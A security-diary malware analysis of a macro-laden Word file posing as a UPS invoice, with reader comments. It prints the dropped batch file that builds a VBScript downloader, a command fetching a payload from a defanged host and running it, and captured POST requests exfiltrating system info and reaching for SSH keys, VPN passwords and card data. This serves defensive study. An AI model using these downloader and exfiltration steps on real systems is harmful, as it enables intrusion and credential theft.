My next class:
Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 28th - Nov 1st 2024

Quick Analyzis of a(nother) Maldoc

Published: 2020-01-09. Last Updated: 2020-01-09 12:15:01 UTC
by Xavier Mertens (Version: 1)
2 comment(s)

Yesterday, one of our readers (thank David!) submitted to us a malicious document disguised as a UPS invoice. Like David, do not hesitate to share samples with us, we like malware samples! I briefly checked the document. Nothing new, based on a classic macro, it was easy to analyze and I can give you an overview of the infection process and what kind of data can be exfiltrated.

The malicious document was called 'ups_invoice_0701932_262.doc' (SHA256:be0939cbb5ba129ef316149adc474b00ad9f526513a6f6f6f6adc802290c02af) and has a current VT score of 10/61[1]. It contained some macros that, once the document opened, perform the malicious activity:

# oledump.py ups_invoice_0701932_262_doc 
A: word/vbaProject.bin
 A1:       734 'PROJECT'
 A2:        30 'PROJECTlk'
 A3:       233 'PROJECTwm'
 A4:        97 'UserForm1/\x01CompObj'
 A5:       294 'UserForm1/\x03VBFrame'
 A6:       883 'UserForm1/f'
 A7:      6688 'UserForm1/o'
 A8: M    1453 'VBA/Module1'
 A9: M   21943 'VBA/Module2'
A10: M    2239 'VBA/Module3'
A11: M    2331 'VBA/Module4'
A12: M  252836 'VBA/NewMacros'
A13: m     938 'VBA/ThisDocument'
A14: m    1493 'VBA/UserForm1'
A15:      8300 'VBA/_VBA_PROJECT'
A16:      1302 'VBA/dir'
A17: M  412655 'VBA/wLoadImages'

 

The infection path is the following: Word > Macro > Batch File (.cmd) >VBScript > Windows PE

The macro dumps a batch file on the disk (SHA256:96d785cdc95bff2f081f57d2c9fdee3b76daf1c3295d2b9e6298678ed32953b9). The dropped file is '%APPDATA%\..EnableDelayedExpansion\Documents1.CMD' Most of the commands are simpe “echo” that are used to create a VBS script '%APPDATA%\..EnableDelayedExpansion\gditbits.vbs'.

Sample of code with garbage words to make it more difficult to read:

@echo off
echo "93319427177886784668351442764871949889113678316627428857276359"
set mtspf=%APPDATA%\..EnableDelayedExpansion\gdibits.vbs
echo 'To determine H. pylori resistance to clarithromycin >> %mtspf%
echo 'were designed against the 23S rRNA gene >> %mtspf%
echo Dim hResBit, MpicOffer, xmpage, MenuPrice, ListPrice, Fundament, BufferBat >> %mtspf%
echo On Error Resume Next >> %mtspf%
echo. >> %mtspf%
echo Set hResBit = Wscript.Arguments >> %mtspf%
echo 'To determine H. pylori resistance to clarithromycin >> %mtspf%
echo 'were designed against the 23S rRNA gene >> %mtspf%
echo "471495911668846928514952834168735538343318577458669595"
echo "137756746277365597113689825816848246219143776556384827"
echo "589196889244714223435471453592227671689523411938182673"
echo "714793381962982623587978735968646573151481843754943393"
echo Set MpicOffer = CreateObject("MSXML2.ServerXMLHTTP.6.0") >> %mtspf%
echo "72797134559562738358938549883642286878881617597196952189815336"
echo ListPrice = hResBit(0) >> %mtspf%
echo Fundament = hResBit(1) >> %mtspf%
echo 'The most common question that restaurants are asking us revolve >> %mtspf%
echo 'special accommodations) that may be requested >> %mtspf%
echo. >> %mtspf%
echo MpicOffer.Open "GET", ListPrice, False >> %mtspf%

 

Then the VBS script is launched with two arguments (see above the Wscript.Arguments):

cscript //nologo %APPDATA%\..EnableDelayedExpansion\gdibits.vbs hxxps://greatingusa[.]com/red1.res %APPDATA%\..EnableDelayedExpansion\hddput8.exe

Finally, hddput8.exe is launched:

start %APPDATA%\..EnableDelayedExpansion\hddput8.exe"

The PE file (SHA256:cfd98c1ee7ab19a63b31bcb6be133e6b61ce723f94a8f91741983bf79b4d1158) has a VT score of 44/72[2]

Here are same POST HTTP requests with exfiltrated data performed by the malware:

POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/90 HTTP/1.1
Content-Type: multipart/form-data; boundary=aksgja8s8d8a8s97
User-Agent: KSKJJGJ
Host: 203.176.135.102:8082
Content-Length: 4419
Cache-Control: no-cache

--aksgja8s8d8a8s97
Content-Disposition: form-data; name="proclist"

***TASK LIST***

[System Process]
System
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
lsm.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
spoolsv.exe
svchost.exe
taskhost.exe
dwm.exe
svchost.exe
svchost.exe
svchost.exe
notepad.exe
calc.exe
svchost.exe
notepad.exe
explorer.exe
iexplore.exe
WmiPrvSE.exe
rundll32.exe
svchost.exe

--aksgja8s8d8a8s97
Content-Disposition: form-data; name="sysinfo"

***S Y S T E M I N F O***

HostName: 3OwiR2Q
OSName: Microsoft Windows 7 Professional 
OSVersion: Service Pack 1
OSArchitecture: 64-bit
ProductType: Workstation
BuildType: Multiprocessor Free
RegisteredOwner: Zahwl3xniYy
RegisteredOrg: CVDh5l614
SerialNumber: 00371-222-2524677-68218
InstallDate: 30/12/1899 00.00.00
LastBootUpTime: 30/12/1899 00.00.00
WindowsDirectory: C:\Windows
SystemDirectory: C:\Windows\system32
BootDevice: \Device\HarddiskVolume1
TotalPhysicalMemory: 3127 Mb
AvailablePhysicalMemory: 3127 Mb


/c ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : <redacted>
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Realtek RTL8139C+ Fast Ethernet NIC
   Physical Address. . . . . . . . . : <redacted>
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : <Redacted>(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.100.6(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : Thursday, January 09, 2019 6:19:19 AM
   Lease Expires . . . . . . . . . . : Thursday, January 16, 2156 1:08:23 AM
   Default Gateway . . . . . . . . . : 192.168.100.1
   DHCP Server . . . . . . . . . . . : 192.168.100.1
   DHCPv6 IAID . . . . . . . . . . . : 240276480
   DHCPv6 Client DUID. . . . . . . . : <Redacted>
   DNS Servers . . . . . . . . . . . : 8.8.8.8
   NetBIOS over Tcpip. . . . . . . . : Disabled


/c net config workstation
Computer name                        \\<Redacted>
Full Computer name                   <Redacted>
User name                            Administrator

Workstation active on                
Software version                     Windows 7 Professional

Workstation domain                   WORKGROUP
Workstation Domain DNS Name          <Redacted>.com
Logon domain                         TESTER

COM Open Timeout (sec)               0
COM Send Count (byte)                16
COM Send Timeout (msec)              250

The command completed successfully.

/c net view /all
There are no entries in the list.

/c net view /all /domain
There are no entries in the list.

/c nltest /domain_trusts
Enumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

/c nltest /domain_trusts /all_trusts
Enumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

--aksgja8s8d8a8s97--

HTTP/1.1 200 OK
server: Cowboy
date: Thu, 09 Jan 2020 09:41:52 GMT
content-length: 3
Content-Type: text/plain

/1/

 

POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 203.176.135.102
Connection: close
Content-Type: multipart/form-data; boundary=---------PAOUUIBNQKZQDUJR
Content-Length: 210

-----------PAOUUIBNQKZQDUJR
Content-Disposition: form-data; name="data"

-----------PAOUUIBNQKZQDUJR
Content-Disposition: form-data; name="source"

OpenSSH private keys
-----------PAOUUIBNQKZQDUJR--

HTTP/1.1 200 OK
connection: close
server: Cowboy
date: Thu, 09 Jan 2020 09:42:07 GMT
content-length: 3
Content-Type: text/plain

/1/

 

POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/83/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 203.176.135.102
Connection: close
Content-Type: multipart/form-data; boundary=---------QPKAEZSIUTKMSAWM
Content-Length: 299

-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="formdata"

{]}

-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="billinfo"

{]}
-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="cardinfo"

{SQL logic error
-----------QPKAEZSIUTKMSAWM--

HTTP/1.1 200 OK
connection: close
server: Cowboy
date: Thu, 09 Jan 2020 09:41:16 GMT
content-length: 3
Content-Type: text/plain

/1/

 

POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 203.176.135.102
Connection: close
Content-Type: multipart/form-data; boundary=---------ITSDTHZDVZQGMVVI
Content-Length: 219

-----------ITSDTHZDVZQGMVVI
Content-Disposition: form-data; name="data"

-----------ITSDTHZDVZQGMVVI
Content-Disposition: form-data; name="source"

OpenVPN passwords and configs
-----------ITSDTHZDVZQGMVVI--

HTTP/1.1 200 OK
connection: close
server: Cowboy
date: Thu, 09 Jan 2020 09:41:41 GMT
content-length: 3
Content-Type: text/plain

/1/

Note that, at the time I'm writing this diary, the domain 'greatingusa[.]com' is still active. 

[1] https://www.virustotal.com/gui/file/be0939cbb5ba129ef316149adc474b00ad9f526513a6f6f6f6adc802290c02af/detection
[2] https://www.virustotal.com/gui/file/cfd98c1ee7ab19a63b31bcb6be133e6b61ce723f94a8f91741983bf79b4d1158/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

2 comment(s)
My next class:
Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 28th - Nov 1st 2024

Comments

re: we like malware samples!
I get interesting samples from time to time, but how do we submit them?
I can see how to submit firewall logs (just don't have access to any that I'm allowed to share, i.e. where security trips over security, sigh) but not how to best submit malware samples. Sounds like that would be a topic for a post, including any pre-processing we submitters could do to help the process along such as current scores on other (linked) testing tools.
There is no way to automate the submission of interesting samples. To send us interesting samples, use the contact form available here: https://isc.sans.edu/contact.html

Diary Archives